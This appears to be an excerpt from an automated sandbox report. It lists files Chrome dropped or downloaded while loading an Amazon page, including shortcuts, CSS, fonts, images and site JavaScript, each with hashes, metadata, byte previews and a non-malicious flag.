                                                                                                                                                                          SHA-512:1E3B9A027EFADF8350A305AB18FDA8B76C4AC19A941562FE63D13519D1C85FE8A86D2AFE1356DEC0A6A9F01FA0B7833C028F5821277AC088BB2E572145030DFC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I"Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V"Y......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V"Y.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 2 00:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                          Entropy (8bit):4.009524492482402
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:52040A7EF9A196C127D0322D09466663
                                                                                                                                                                          SHA1:8A79D24E25AA6A29F7739D545A78FC35A7096DF8
                                                                                                                                                                          SHA-256:5A7B2FC10D33004046B5CEC31B0EA854634175E7F491AC4704F09959B2ABD11D
                                                                                                                                                                          SHA-512:593A426C2307E42B7B190715ED242B40F72CF85FEF8F86FDF12DBC9E2A04B9AAF6D3778C2B1077A5EA93A0BA410596135B0174AE5838042CCE970CBE3D0A6BCD
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....&..{........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I"Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V"Y......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V"Y.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V"Y.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 2 00:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                          Entropy (8bit):3.9992100128389967
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:CB45BEC58F4EF1FC464AEB64E818EEA1
                                                                                                                                                                          SHA1:6E861C1A9F4D2E2B4DFB2D13F184B3A00EDD41BC
                                                                                                                                                                          SHA-256:7E074591A00B1260449F1590D801FD126175025E018F17FDC3BB0BCE9BC2A17A
                                                                                                                                                                          SHA-512:CF5E5640541DF48432489A588CA222854E36B059DAFED87034FCA80697164BF10B584ED15D2A40D3F4E75AC487FC7ADEC862FCC0393739BF1C92921F97053D01
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....%,!{........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I"Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V"Y......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V"Y.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V"Y.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 2 00:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                          Entropy (8bit):4.010268391963366
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:9BC9729774A20981541CDA48C6710737
                                                                                                                                                                          SHA1:B00630B17A43791CF4DEE0FEF9A672F7E7F46EA8
                                                                                                                                                                          SHA-256:0129B29C407ABB063DA6C42E0A38BA19AC704C66054E3B4DFF2C80C3858DF6C0
                                                                                                                                                                          SHA-512:325E022464CDFB1A728CD46DAF92B05AD55D6D8D3537D7687A2692B15BEE1F8236C4A00C4397D9CB22CBB01CB0C95D274011D7FC03A51A8DB757C6F1F1B44969
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.......{........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I"Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V"Y......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V"Y.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V"Y.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (18121), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):18121
                                                                                                                                                                          Entropy (8bit):5.2667350205862
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:5EA6CF08DBDCE6C1620779C1E86B0A73
                                                                                                                                                                          SHA1:B06AF5A2E3F391670409C94E9F76EEDEF084A3C0
                                                                                                                                                                          SHA-256:CE15CD0773F77B66CC95DE5C483D3E3F72C0CBC00854621C1FCBB0FC5A31A98D
                                                                                                                                                                          SHA-512:83E67E3B5907FD81DAE9E93F9C33EE3DE3D131EB569B7C1DB4BB70510F69F2EAB42800DCD6CEDE866EAB733C8DA3289319351B16D28608FA16730F817DE38710
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd
                                                                                                                                                                          Preview:@charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/S/sash/sHjosC8mtVdCbEZ.gif) no-repeat;display:inline-block;vertical-align:top;width:900px;height:3px}.gw-icon{background-size:132px 235px}#pageContent{background:#E3E6E6;margin:0 auto;max-width:none;min-width:1000px;overflow:hidden}#gw-content-grid hr{height:20px;border:none;margin:0}#gw-layout{padding:0 10px 0}#gw-card-layout{max-width:1480px;margin:0 auto;overflow:hidden;padding:20px 0}#gw-card-layout>.gw-col{max-width:400px}#gw-card-layout>.gw-col[data-col-span-ws="2"]{max-width:none}#gw-card-layout>.gw-col[data-col-span-sm="2"]{max-width:none}#gw-card-layout hr{border:none;margin:0}.gw-card-layout[data-flow-dir="h"]>.gw-col{height:420px}#main-content{margin:0 10px}#gw-content-grid{max-width:1480px;margin:0 auto}#gw-content-grid hr:
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16460, version 1.655
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):16460
                                                                                                                                                                          Entropy (8bit):7.987708256804987
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:15E17F26C664EE0518F82972282E6FF3
                                                                                                                                                                          SHA1:46B91BDA68161C14E554A779643EF4957431987B
                                                                                                                                                                          SHA-256:4065B43BA3DB8DA5390BA0708555889F78E86483FE0226EF79EA22D07C306B89
                                                                                                                                                                          SHA-512:54EADB53589C5386A724C8EEA2603481EBB23E7062FD7BFAB0EAFE55C9E1344F96320259412FB0DC7A6F5B6E09B32F6907F9AAA66BCA5812D45157E3771C902F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/KFPk-9IF4FqAqY-.woff2
                                                                                                                                                                          Preview:wOF2......@L..........?.........................?FFTM..8..j..@.`..~.....h..i.6.$..F..<.. .....a?webf..}...6..........n.......fE.q. ..Y...9.2d.$.}[..0.H....j.k....U..#"-SM.t..."D....+....t.8f...s...g636|..g._.....EB.T.!.B..!..y...k....Ya..G~.Y.;+....)...k...=it.........k_.^.z.#.).).....Y?....}..&N.s....1..=A.FXSG...`C...00..5*l..#6...w....-...hkJ. .-...$D..1j..F.]..ny^..]..:.\...2......^n...5P......_.6..k..2..K..i......y....K...?..6...*q>.. .....a9...........4/.c.E.........q...8N..$.$....z.?.d..v.QmY..D....s...:Y...S.|..|...[..@...4...V..n..s....t....A....\.v..X...M..O4.!=$..35m1\..wT"..w.c.s(...]t.?....."Q....1(.p..%0<-v..b.^R.)E:$..0<.....R.B.TY...K..n\..{#...kd.-.8..#.........t;..3.....IT[..2.L...........H..$..._.j.....b<B..uN.,*....k....@.k.k.....[.........6....U.1bDDD..Qu....R..+a......^.iS..qb.^..U.uU.sj..-<D....H..Y.J..[......8....V}........}.$^...CE..jc. d`.^..q..Nw.....`...1...S19.u....`H..WT.1.....y...c.A..op`..V..I....
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):4907
                                                                                                                                                                          Entropy (8bit):7.9029587038946945
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:3B79AF7A5CA192F0B5416862D303CE35
                                                                                                                                                                          SHA1:187905D471C17C919982C19F375C20EBAA164C10
                                                                                                                                                                          SHA-256:1A4AB0F155801E99DE6DC878E638B08765116CBBEB9783C5C056546C02181803
                                                                                                                                                                          SHA-512:43014E3781A718B7FE4B27A624A1756C714D2E88AA4942F9B26D4B50ACA292AB1E633F596285647DEAA548D6E2A14BAFF1E657CC44D18F2E5AED946907618728
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NjJjNmNmMjgt-w186._SY116_CB412108491_.jpg
                                                                                                                                                                          Preview:......JFIF.............C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......t....".........................................E...........................1!"A..Qq.BR....a$256CSTrtu.......#bcs...................................6.........................!.."1AQa.Sq...23B..#4Urs...............?...DH.DH.DH.M..q...'$_7..NM......l.c._w......M.. {.g.."rE.k..E..N......+6w..\w.;.wQ...l^....^.[.....t..I..ba.hU{H..;....mQC.:..#=+...u.k...3\;n..............Z........f.!..!..!..!..!cr..b+O..D+H.!s......>.$Z..~..[Pi...6.4.W2/e.<...o...2...q.......}$) .Q....k..X..>.2N.;N.3.W......K..V..qN{...b>f..Z.5.k..hsu..........|.,.}..}.h.z.t.Bj...tn....;v.u..._.7sx..../........PGy..&......X...W..t!.A.IA.O.2...AWH....0..l..b=.....v...4.A.!..F..x. x...s|2[r6F.3........O.+xm...^......%Pkc..n.oEm........$..p.a.Ty.W...G...\X^#.v.G.....G.5....../MX.p.7.4...G....(os..(..F.ir.l......!.C.a.....s+nR... 6.....;
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                          Entropy (8bit):3.2226627197680635
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:F837AA60B6FE83458F790DB60D529FC9
                                                                                                                                                                          SHA1:14AF87CCEC7F81BB28D53C84DA2FD5A9D5925CDA
                                                                                                                                                                          SHA-256:DCECAB1355B5C2B9ECEF281322BF265AC5840B4688748586E9632B473A5FE56B
                                                                                                                                                                          SHA-512:A85E09C3B5DBB560F4E03BA880047DBC8B4999A64C1F54FBFBCA17EE0BCBED3BC6708D699190B56668E464A59358D6B534C3963A1329BA01DB21075EF5BEDACE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):29858
                                                                                                                                                                          Entropy (8bit):5.404188117327839
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:4A08078E23F5EBF42DBB876CDB4D5AFD
                                                                                                                                                                          SHA1:E7ABB657E7E9E2DB6CB35872BD2925F023CEA45F
                                                                                                                                                                          SHA-256:18399EB821447D18D56DA8DD4EFE473412F58BEAF448ADB5DACD58BB03653AA7
                                                                                                                                                                          SHA-512:1119214961102FD1EE23370878774D81F4D2019A12077127153853007A56A54EBB5D1FD52A9BABDB760A0C7A80CFE6039A88B8FE2E65D1F7598C63198811F46B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-Gm2pE content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-N3BZYHQ4CWNN1BJ42984 pd_rd_wg-02PbT pd_rd_r-0c7c853e-6608-46c7-8b56-5f6e3004acb9 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstancecwLi9VUkzuyRuvfEDUdeJw\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 240 x 735, 8-bit colormap, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6829
                                                                                                                                                                          Entropy (8bit):7.762659774988712
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:13FD5F8C8447783E11D8B9717A38CF2F
                                                                                                                                                                          SHA1:553793E4D98E5A3C349047B9D9097EECF5D799D9
                                                                                                                                                                          SHA-256:9B280F263A12EC4C9B718DCA074F908493A05A81EB5F9D29023949E33EBD3152
                                                                                                                                                                          SHA-512:E06A02652E492FFEED3BA4D324C2DC16475FCCE4A884472B5FD28D0BAE4AA5434BDB06536E7827360ECED8AD82A193B5E78FB8FABFCE8F6BCE86A36C57187FE8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:.PNG........IHDR.............h.j....PLTE....../8B..................EIRtw~{~.8=G7<F;@J>CMAFP...:?H<AJ?DM@ENCHQBGPFKT5;EDIQFKSEJRQV^6<E8>GOWctx~sw}......CKVJR]:@H<BJ=CK@FN`el}.....:DP6?JEP]6>H9AK;CMCKUBJTnw.t|......................09C1:D>IU3<F?JV9CN4=G5>H>HSDNYDMW=EN?GPAIRBJSDLUXbmGOXHPYkt~eltx..qw~AMY6@J7@IIT_;DM=FOMWaHQZ\fpU]eu{..............................................CMVcmv...ry...................................................#..&..(..*..+..-.....0..3..4..6..9..=..>.<..@..C..@..D..G..H.D..K..O..R..M..V..T..g..n..p..r..r..t..u..v..x...................................&..2..=..L..U..\..c..m..x...............................................................................................................................{{{tttkkkeeeZZZRRRKKKFFF@@@<<<666333***$$$.....................`.FB....tRNS...................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1599
                                                                                                                                                                          Entropy (8bit):7.544935724436636
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:7E3BE9F05D717AA9B5B8EFF87A0DB2ED
                                                                                                                                                                          SHA1:FA4129AEAF2B91E5B9009176F318CE1A93F53BD7
                                                                                                                                                                          SHA-256:8B4A307A0EA37F59D262F1209CD84A84FCCD4613335A97D9BD7D232646C610A4
                                                                                                                                                                          SHA-512:A0DBA04BCFAB074F305FAC0F8F50C98919CD21B1BD7FCD1210D87BA4C3E42408F28BD003A5946D3246BD3C448FB5EAD2BC4FFB318E8E4040F6B4100DD32901DF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x......................................................!1Q.q.."ARab....#2BSc..$s...................................................?...D@DD.D@DD.UZ.j.f...N.!.i......o........fV.)W..e.F..v.,q..0B..p%.................j}..J...j....[..N.&....Vcf.-.a...{...Ihk.=.......a..../..7.......#.-.PqA..s.Q..3.jF.."dM..'...j..t.{3\.....+....................B.Q.r.L.............I..........p...F....4.@,...e.J.67r.]....;.v..)...Y..(f./.A....F....}.._6.....l^.5..;...(={7..0*RL4..y..a.E6V..!c".h.5.h..4...D@DD.D@DD.D@X.n...=...p.......`....X(...N.y.X.(:9..<...i.].._...:..b......78..:.}$.Z"..%X...v-.....C=..3..F....cX.0.V....2@...w...S.:.2...Lz.1.....@.H...............`.......].b..P...p&I.f0_...R...!.]..B....4..\yV+jc..lL....,.N.........X1..F.._+...u.-..B?.....R..9..o...+..<......K..............\...P.?..i..O
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4366
                                                                                                                                                                          Entropy (8bit):7.86250732039938
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:77E0BA0F901294B64B65677BFD5D33DA
                                                                                                                                                                          SHA1:D532323485C46E020701A0CFE01B73099CC6C71B
                                                                                                                                                                          SHA-256:67F1D8CE3DF093693C72F80220D4D161BFB98ED962AD2EEAA863075D0F3D2C35
                                                                                                                                                                          SHA-512:723F1B34A397F2A3F440F38079EC3911F502814E6517EEBBA2865298C09407F8B9B7507E35636F99F2417679BCCA6F1A0228F8793C848913EE1C43B2C92A71AB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF.....H.H.....C................"...."+"""""+4++++++44444444??????IIIIIRRRRRRRRRR...C.......$..$V:0:VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV......t....".......................................>.........................!1..AQ."2aq..#4r....Bb...3....RT..................................(........................!1.#AQaq.."2R.............?....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R..(z.j.;+.m!.Y.......*;...W...O..6.....k.p...\..'#%r9..kn~.i,O.X..@...0.....n.X7...............u.N.Z.[......?.Ez....;.a...8...~}*.=V..&68...O.d.Y...h.n....|.......:w..|...Zm.I..D.V.Nq.3...@W..GM.....=.....'.L.....l.......].Qj..)&...8.A...FM..4..<@..z....[.zBc......#...,..0:X....kFn....:{...b....yTCv.M..9.7....gH..I$.P...r..1.....V.....:V....n.....ee<..X.......6.....Q..........x.."..X.JR.R......K.$hd..^.Ab<y.5...4......5Gl.......V........Mz....1....Q...d.*.-^.c......?<V..........q;Y.{Qim>.so...Y..cv<O$t..`.;)............a.>.....O.D....8<.9..TF..k.I~........:
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (538)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2790
                                                                                                                                                                          Entropy (8bit):5.213922778439056
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:AF755F79880C8525385343E00506AC92
                                                                                                                                                                          SHA1:8F7277F8A30987091550587BE5CF2898B01DAC1B
                                                                                                                                                                          SHA-256:C85DFFF496D65FE18094CDEA5125A7D68F5AA9CEB59D3FBBD6A55F31745A3CF6
                                                                                                                                                                          SHA-512:58261CAB648D4ECB5C9DD1C6CFD5BD7DA1EEB716168A2CD8FB42A957358B9ED03BF2EFD712EBEEE12B17AD802EF85625EE79D0E72278DB5FB327763A731E9029
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/I/11NbhapZAIL.js?AUIClients/WebFlowIngressJs
                                                                                                                                                                          Preview:(function(d){var f=window.AmazonUIPageJS||window.P,g=f._namespace||f.attributeErrors,a=g?g("WebFlowIngressJs",""):f;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,f,g){d.register("webflow-fetch-experience",function(){return{fetchExperience:function(a){return fetch(a,{headers:{Accept:"application/vnd.com.amazon.xa+html"}}).then(function(a){if(a.ok)return a.text();throw Error("Network response: "+a.status+", "+a.error);}).then(function(a){return{html:a}}).catch(function(a){return{error:a}})}}});.d.when("A","a-modal-framework","a-modal-framework-constants").register("webflow-modal",function(a,d,b){return{presentModal:function(c,e){c={type:"ajax",source:c};e='\x3cdiv class\x3d"'+b.CONTENT_WRAPPER_CLASS+'"\x3e\x3c/div\x3e';e=$('\x3cdiv style\x3d"background-color:white" class\x3d"overlay-container"\x3e\x3c/div\x3e').append("",'\x3cbutton class\x3d"overlay-close"\x3e\x3cspan class\x3d"a-icon a-icon-close-white"\x3e\x3c/span\x3e\x3c/button\x3e').append(e
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (2681)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126460
                                                                                                                                                                          Entropy (8bit):5.4944976484967345
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:1B556C73C5FC0411A5FA9D71277D8F7C
                                                                                                                                                                          SHA1:190D8E5AD5ADB5976211753197BA4B95935B154B
                                                                                                                                                                          SHA-256:A79A9AC26A3FACC35971D3ECAA13E2A6B12E666FCBC4AEE6ED857039E81E5E48
                                                                                                                                                                          SHA-512:D579216F67DC7C0FC5EDEE463892BC6A045866969251A21CE93403908CEC2C9E889250696E983ABDB2D46F7EAECD3F3055C4428838EE47BDD4789A38667A4495
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x400000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):23
                                                                                                                                                                          Entropy (8bit):4.175735869100492
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C7D3355DDAC8D35912F6CB56C4BE6ECA
                                                                                                                                                                          SHA1:4ECB85CA8A4B633FE7DB11B2B7591AF83A89D406
                                                                                                                                                                          SHA-256:88EA58255D4CD82340F7ACAABE0E6A99F195A4DC2CA6EF56EC503D03B331BEE5
                                                                                                                                                                          SHA-512:8164D943F11F6559A8AB31869676FD4801E6E8C18DF05B53EF2F5CE5EC23BD632E66018EC134DA658289B6FA4C2BA15EF47DCF6210866457CFA7DEDB45994272
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:window.ue_adb_chk = 1;.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
